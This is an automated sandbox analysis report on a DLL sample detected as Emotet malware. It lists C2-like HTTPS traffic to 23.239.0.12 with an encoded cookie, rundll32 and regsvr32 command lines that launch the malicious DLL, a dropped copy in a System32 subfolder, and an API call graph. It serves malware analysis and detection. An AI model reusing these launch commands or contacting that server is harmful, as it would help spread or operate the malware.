                                                                                                                              May 14, 2022 04:21:52.717709064 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.107435942 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.107496023 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:53.107914925 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:53.107990980 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.111130953 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.156501055 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:53.949539900 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:53.949723959 CEST4434976423.239.0.12192.168.2.4
                                                                                                                              May 14, 2022 04:21:53.950025082 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.950639963 CEST49764443192.168.2.423.239.0.12
                                                                                                                              May 14, 2022 04:21:53.950681925 CEST4434976423.239.0.12192.168.2.4

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • 23.239.0.12

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.44976423.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-05-14 02:21:53 UTC0OUTGET / HTTP/1.1
                                                                                                                              Cookie: Dyz=DabvmfULUPwRS87n3NYaWAB5lbtM+RX1RWCxIsW5JR2ugrMjYBp820HE70OdzwJs7yvgQCtqT9ZajKoH765EieJsgJY5Ki8zTzKQ99Gho8WMqwDn4OyZsaEfNbr84GkPPx5HtU7nHZMAlr2v3mlg410lium/3Uzv2iMM+QbLckLf53rpF7ndEZLZxV5q4uD1NTdffI52CoPOk7Ky1CgFUQCgYCDOBhB/qP6OSm4ZCqhqrMM5PSKhRo5dTpg29g==
                                                                                                                              Host: 23.239.0.12
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2022-05-14 02:21:53 UTC0INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 14 May 2022 02:21:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              2022-05-14 02:21:53 UTC0INData Raw: 33 64 65 0d 0a c3 bb ee cc af 7a df 97 90 73 ac ae 99 e0 8a 19 0d c3 ac 89 ca 7f 20 33 db 0a 83 8b a5 7e 89 6e c9 59 2c a0 5a 03 2b 47 ee 2c 86 ff 7f e9 20 a5 b6 ec b3 0d be d9 c0 28 e4 85 4a b0 78 6c ba e5 b6 d8 4d 63 a9 34 88 eb cd 45 be dd 2e f3 15 f2 6e 26 01 db fa 09 e4 53 a7 bc 60 84 62 da 71 74 b8 cc 60 c5 30 74 1e 39 df 8c 40 30 28 00 86 a7 95 1e 0f 94 b0 fd 45 30 32 27 8d 65 7d 36 e4 3c b3 ce c8 79 28 6a 28 b2 c3 69 a7 25 9f fb bb 5c c1 96 73 c2 e7 5d ce d6 66 55 93 7b be e0 e2 af 0d c8 86 13 c1 c3 0b ee 93 f7 0a e3 97 1b 14 90 26 78 1d e8 a7 c4 09 c9 39 9f 6f c0 c1 e1 da b4 ea 31 14 68 fc 3e 31 b3 21 30 e5 cd 28 c5 ac ef b4 05 8d 48 99 ec b4 27 94 16 06 a7 53 73 22 c7 9b 92 40 17 25 66 c8 1f f6 d7 e0 d6 22 20 18 b0 22 56 b3 21 39 63 07 56 5f 77
                                                                                                                              Data Ascii: 3dezs 3~nY,Z+G, (JxlMc4E.n&S`bqt`0t9@0(E02'e}6<y(j(i%\s]fU{&x9o1h>1!0(H'Ss"@%f" "V!9cV_w


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:04:21:15
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\loaddll64.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll"
                                                                                                                              Imagebase:0x7ff7e39a0000
                                                                                                                              File size:140288 bytes
                                                                                                                              MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:04:21:15
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
                                                                                                                              Imagebase:0x7ff7bb450000
                                                                                                                              File size:273920 bytes
                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:04:21:15
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
                                                                                                                              Imagebase:0x7ff6a4800000
                                                                                                                              File size:24064 bytes
                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:04:21:15
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
                                                                                                                              Imagebase:0x7ff6ecae0000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:04:21:16
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer
                                                                                                                              Imagebase:0x7ff6ecae0000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:04:21:19
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"
                                                                                                                              Imagebase:0x7ff6a4800000
                                                                                                                              File size:24064 bytes
                                                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:04:21:19
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:69632 bytes
                                                                                                                              MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:04:21:36
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:04:21:40
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:04:21:40
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Target ID:13
                                                                                                                              Start time:04:21:41
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:04:21:42
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:16
                                                                                                                              Start time:04:21:43
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                              Imagebase:0x7ff6edbf0000
                                                                                                                              File size:163336 bytes
                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:17
                                                                                                                              Start time:04:21:43
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:18
                                                                                                                              Start time:04:21:44
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:04:21:45
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:20
                                                                                                                              Start time:04:21:54
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:21
                                                                                                                              Start time:04:22:01
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:04:22:13
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                              Imagebase:0x7ff7338d0000
                                                                                                                              File size:51288 bytes
                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:28
                                                                                                                              Start time:04:22:44
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                              Imagebase:0x7ff678970000
                                                                                                                              File size:455656 bytes
                                                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              General

                                                                                                                              Target ID:29
                                                                                                                              Start time:04:22:45
                                                                                                                              Start date:14/05/2022
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff647620000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:10.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                Signature Coverage:16.1%
                                                                                                                                Total number of Nodes:684
                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                execution_graph 9720 7fffefb91ee7 9721 7fffefb91f13 RtlAllocateHeap 9720->9721 9722 7fffefb91f5c 9721->9722 9723 7fffefb91f3d RtlDeleteBoundaryDescriptor 9721->9723 9723->9722 9724 c90000 9725 c90183 9724->9725 9726 c9043e VirtualAlloc 9725->9726 9730 c90462 9726->9730 9727 c90a7b 9728 c90531 GetNativeSystemInfo 9728->9727 9729 c9056d VirtualAlloc 9728->9729 9733 c9058b 9729->9733 9730->9727 9730->9728 9731 c90a00 9731->9727 9732 c90a56 RtlAddFunctionTable 9731->9732 9732->9727 9733->9731 9734 c909d9 VirtualProtect 9733->9734 9734->9733 9735 7fffefb92290 9738 7fffefb922b6 9735->9738 9736 7fffefb922f3 9746 7fffefb922be 9736->9746 9789 7fffefb51230 9736->9789 9738->9736 9738->9746 9747 7fffefb92154 9738->9747 9741 7fffefb92335 9743 7fffefb92154 126 API calls 9741->9743 9741->9746 9742 7fffefb51230 8 API calls 9744 7fffefb92328 9742->9744 9743->9746 9745 7fffefb92154 126 API calls 9744->9745 9745->9741 9748 7fffefb921e1 9747->9748 9749 7fffefb92162 9747->9749 9751 7fffefb9221e 9748->9751 9758 7fffefb921e5 9748->9758 9794 7fffefb94110 HeapCreate 9749->9794 9752 7fffefb92279 9751->9752 9753 7fffefb92223 9751->9753 9755 7fffefb9216d 9752->9755 9914 7fffefb92f50 9752->9914 9887 7fffefb93108 9753->9887 9755->9736 9758->9755 9759 7fffefb93a48 46 API calls 9758->9759 9762 7fffefb92212 9759->9762 9761 7fffefb92179 _RTC_Initialize 9764 7fffefb9217d 9761->9764 9769 7fffefb92189 GetCommandLineA 9761->9769 9766 7fffefb92c94 48 API calls 9762->9766 9892 7fffefb9415c HeapDestroy 9764->9892 9768 7fffefb92217 9766->9768 9767 7fffefb92243 FlsSetValue 9770 7fffefb92259 9767->9770 9771 7fffefb9226f 9767->9771 9898 7fffefb9415c HeapDestroy 9768->9898 9813 7fffefb93eec 9769->9813 9899 7fffefb92cbc 9770->9899 9908 7fffefb93024 9771->9908 9780 7fffefb921ab 9851 7fffefb92c94 9780->9851 9783 7fffefb921b7 9788 7fffefb921cb 9783->9788 9866 7fffefb93aec 9783->9866 9788->9755 9893 7fffefb93a48 9788->9893 9790 7fffefb51249 _Wcsftime 9789->9790 9791 7fffefb51276 9790->9791 9792 7fffefb920e0 __initmbctable 8 API calls 9791->9792 9793 7fffefb9203e 9792->9793 9793->9741 9793->9742 9795 7fffefb92169 9794->9795 9796 7fffefb94134 HeapSetInformation 9794->9796 9795->9755 9797 7fffefb92fa0 9795->9797 9796->9795 9920 7fffefb936f0 9797->9920 9799 7fffefb92fab 9925 7fffefb96970 9799->9925 9802 7fffefb93014 9804 7fffefb92c94 48 API calls 9802->9804 9803 7fffefb92fb4 FlsAlloc 9803->9802 9805 7fffefb92fcc 9803->9805 9806 7fffefb93019 9804->9806 9807 7fffefb93108 __wtomb_environ 45 API calls 9805->9807 9806->9761 9808 7fffefb92fdb 9807->9808 9808->9802 9809 7fffefb92fe3 FlsSetValue 9808->9809 9809->9802 9810 7fffefb92ff6 9809->9810 9811 7fffefb92cbc _set_doserrno 45 API calls 9810->9811 9812 7fffefb93000 GetCurrentThreadId 9811->9812 9812->9806 9814 7fffefb93f1b GetEnvironmentStringsW 9813->9814 9815 7fffefb93f4d 9813->9815 9816 7fffefb93f29 9814->9816 9817 7fffefb93f35 GetLastError 9814->9817 9815->9816 9818 7fffefb94010 9815->9818 9820 7fffefb93f5b GetEnvironmentStringsW 9816->9820 9821 7fffefb93f70 WideCharToMultiByte 9816->9821 9817->9815 9819 7fffefb9401d GetEnvironmentStrings 9818->9819 9822 7fffefb9219b 9818->9822 9819->9822 9827 7fffefb9402f 9819->9827 9820->9821 9820->9822 9824 7fffefb93fbe 9821->9824 9825 7fffefb93fff 9821->9825 9838 7fffefb93758 GetStartupInfoA 9822->9838 9932 7fffefb9309c 9824->9932 9826 7fffefb94002 FreeEnvironmentStringsW 9825->9826 9826->9822 9828 7fffefb9309c __setargv 45 API calls 9827->9828 9831 7fffefb94053 9828->9831 9833 7fffefb94069 __initmbctable 9831->9833 9834 7fffefb9405b FreeEnvironmentStringsA 9831->9834 9832 7fffefb93fce WideCharToMultiByte 9832->9826 9835 7fffefb93ff7 9832->9835 9836 7fffefb94077 FreeEnvironmentStringsA 9833->9836 9834->9822 9837 7fffefb93024 free 45 API calls 9835->9837 9836->9822 9837->9825 9839 7fffefb93108 __wtomb_environ 45 API calls 9838->9839 9847 7fffefb93795 9839->9847 9840 7fffefb93981 GetStdHandle 9844 7fffefb9395b 9840->9844 9841 7fffefb939b0 GetFileType 9841->9844 9842 7fffefb93108 __wtomb_environ 45 API calls 9842->9847 9843 7fffefb93a10 SetHandleCount 9850 7fffefb921a7 9843->9850 9844->9840 9844->9841 9844->9843 9846 7fffefb97ee4 _lock InitializeCriticalSectionAndSpinCount 9844->9846 9844->9850 9845 7fffefb938c4 9845->9844 9848 7fffefb938f7 GetFileType 9845->9848 9849 7fffefb97ee4 _lock InitializeCriticalSectionAndSpinCount 9845->9849 9845->9850 9846->9844 9847->9842 9847->9844 9847->9845 9847->9850 9848->9845 9849->9845 9850->9780 9859 7fffefb93df4 9850->9859 9852 7fffefb92cb0 9851->9852 9853 7fffefb92ca3 FlsFree 9851->9853 9854 7fffefb96a2f DeleteCriticalSection 9852->9854 9855 7fffefb96a4d 9852->9855 9853->9852 9856 7fffefb93024 free 45 API calls 9854->9856 9857 7fffefb96a6a 9855->9857 9858 7fffefb96a5b DeleteCriticalSection 9855->9858 9856->9852 9857->9764 9858->9855 9860 7fffefb93e0c 9859->9860 9861 7fffefb93e11 GetModuleFileNameA 9859->9861 10078 7fffefb94ecc 9860->10078 9863 7fffefb93e43 __setargv 9861->9863 9864 7fffefb9309c __setargv 45 API calls 9863->9864 9865 7fffefb93e97 __setargv 9863->9865 9864->9865 9865->9783 9867 7fffefb93b09 9866->9867 9870 7fffefb93b0e _FF_MSGBANNER 9866->9870 9868 7fffefb94ecc __initmbctable 83 API calls 9867->9868 9868->9870 9869 7fffefb93108 __wtomb_environ 45 API calls 9875 7fffefb93b4d _FF_MSGBANNER 9869->9875 9870->9869 9873 7fffefb921c0 9870->9873 9871 7fffefb93bc6 9872 7fffefb93024 free 45 API calls 9871->9872 9872->9873 9873->9788 9881 7fffefb9347c 9873->9881 9874 7fffefb93108 __wtomb_environ 45 API calls 9874->9875 9875->9871 9875->9873 9875->9874 9876 7fffefb93c02 9875->9876 9878 7fffefb97fbc _FF_MSGBANNER 45 API calls 9875->9878 9879 7fffefb93ba2 9875->9879 9877 7fffefb93024 free 45 API calls 9876->9877 9877->9873 9878->9875 9880 7fffefb96550 _isindst 6 API calls 9879->9880 9880->9875 9882 7fffefb93492 _cinit 9881->9882 10482 7fffefb973f4 9882->10482 9884 7fffefb934af _initterm_e 9886 7fffefb934d2 _cinit 9884->9886 10485 7fffefb973dc 9884->10485 9886->9788 9888 7fffefb9312d 9887->9888 9890 7fffefb92237 9888->9890 9891 7fffefb9314b Sleep 9888->9891 10502 7fffefb96cec 9888->10502 9890->9755 9890->9767 9891->9888 9891->9890 9892->9755 9894 7fffefb93a59 9893->9894 9895 7fffefb93aa8 9894->9895 9896 7fffefb93a70 DeleteCriticalSection 9894->9896 9897 7fffefb93024 free 45 API calls 9894->9897 9895->9780 9896->9894 9897->9894 9898->9755 9900 7fffefb96ba0 _lock 45 API calls 9899->9900 9901 7fffefb92d11 9900->9901 10511 7fffefb96a80 LeaveCriticalSection 9901->10511 9909 7fffefb93029 HeapFree 9908->9909 9913 7fffefb93059 realloc 9908->9913 9910 7fffefb93044 9909->9910 9909->9913 9911 7fffefb967e0 _errno 43 API calls 9910->9911 9912 7fffefb93049 GetLastError 9911->9912 9912->9913 9913->9755 9915 7fffefb92f88 9914->9915 9916 7fffefb92f64 9914->9916 9915->9755 9917 7fffefb92f78 FlsSetValue 9916->9917 9918 7fffefb92f69 FlsGetValue 9916->9918 10512 7fffefb92e18 9917->10512 9918->9917 9929 7fffefb92c5c EncodePointer 9920->9929 9922 7fffefb936fb _initp_misc_winsig 9923 7fffefb9755c EncodePointer 9922->9923 9924 7fffefb9373e EncodePointer 9923->9924 9924->9799 9926 7fffefb96993 9925->9926 9928 7fffefb92fb0 9926->9928 9930 7fffefb97ee4 InitializeCriticalSectionAndSpinCount 9926->9930 9928->9802 9928->9803 9931 7fffefb97f11 9930->9931 9931->9926 9933 7fffefb930b8 9932->9933 9935 7fffefb930f0 9933->9935 9936 7fffefb930d0 Sleep 9933->9936 9937 7fffefb96c34 9933->9937 9935->9825 9935->9832 9936->9933 9936->9935 9938 7fffefb96cc8 realloc 9937->9938 9946 7fffefb96c4c realloc 9937->9946 9941 7fffefb967e0 _errno 44 API calls 9938->9941 9939 7fffefb96c84 RtlAllocateHeap 9942 7fffefb96cbd 9939->9942 9939->9946 9941->9942 9942->9933 9943 7fffefb96cad 9996 7fffefb967e0 9943->9996 9946->9939 9946->9943 9947 7fffefb96cb2 9946->9947 9948 7fffefb96c64 9946->9948 9950 7fffefb967e0 _errno 44 API calls 9947->9950 9948->9939 9951 7fffefb97160 9948->9951 9960 7fffefb96f0c 9948->9960 9993 7fffefb9334c 9948->9993 9950->9942 9999 7fffefb9d2ac 9951->9999 9954 7fffefb9717d 9956 7fffefb96f0c _FF_MSGBANNER 45 API calls 9954->9956 9958 7fffefb9719e 9954->9958 9955 7fffefb9d2ac _FF_MSGBANNER 45 API calls 9955->9954 9957 7fffefb97194 9956->9957 9959 7fffefb96f0c _FF_MSGBANNER 45 API calls 9957->9959 9958->9948 9959->9958 9961 7fffefb96f2f 9960->9961 9962 7fffefb9d2ac _FF_MSGBANNER 42 API calls 9961->9962 9992 7fffefb970d4 9961->9992 9963 7fffefb96f51 9962->9963 9964 7fffefb970d6 GetStdHandle 9963->9964 9965 7fffefb9d2ac _FF_MSGBANNER 42 API calls 9963->9965 9966 7fffefb970e9 _FF_MSGBANNER 9964->9966 9964->9992 9967 7fffefb96f64 9965->9967 9969 7fffefb970ff WriteFile 9966->9969 9966->9992 9967->9964 9968 7fffefb96f75 9967->9968 9968->9992 10018 7fffefb97fbc 9968->10018 9969->9992 9972 7fffefb96fb9 GetModuleFileNameA 9974 7fffefb96fd9 9972->9974 9977 7fffefb9700a _FF_MSGBANNER 9972->9977 9973 7fffefb96550 _isindst 6 API calls 9973->9972 9975 7fffefb97fbc _FF_MSGBANNER 42 API calls 9974->9975 9976 7fffefb96ff1 9975->9976 9976->9977 9980 7fffefb96550 _isindst 6 API calls 9976->9980 9978 7fffefb97065 9977->9978 10027 7fffefb9bf14 9977->10027 10036 7fffefb9bdf4 9978->10036 9980->9977 9983 7fffefb97090 9986 7fffefb9bdf4 